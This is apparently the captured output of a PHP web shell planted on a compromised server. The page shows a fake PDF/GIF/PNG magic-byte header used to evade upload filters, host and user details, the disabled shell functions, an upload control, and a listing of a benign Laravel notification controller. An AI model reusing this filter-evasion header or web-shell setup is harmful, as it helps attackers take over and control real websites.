%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/public_html/admin1/app/Http/Controllers/ |
Upload File : |
<?php
namespace App\Http\Controllers;
use App\Helper\Reply;
use Illuminate\Http\Request;
class NotificationController extends AccountBaseController
{
public function showNotifications()
{
$this->userType = 'all';
if (in_array('client', user_roles())) {
$this->userType = 'client';
}
$view = view('notifications.user_notifications', $this->data)->render();
return Reply::dataOnly(['status' => 'success', 'html' => $view]);
}
public function all()
{
$this->pageTitle = __('app.newNotifications');
$this->userType = 'all';
if (in_array('client', user_roles())) {
$this->userType = 'client';
}
return view('notifications.all_user_notifications', $this->data);
}
public function markAllRead()
{
$this->user->unreadNotifications->markAsRead();
return Reply::success(__('messages.notificationRead'));
}
public function markRead(Request $request)
{
$this->user->unreadNotifications->where('id', $request->id)->markAsRead();
return Reply::dataOnly(['status' => 'success']);
}
}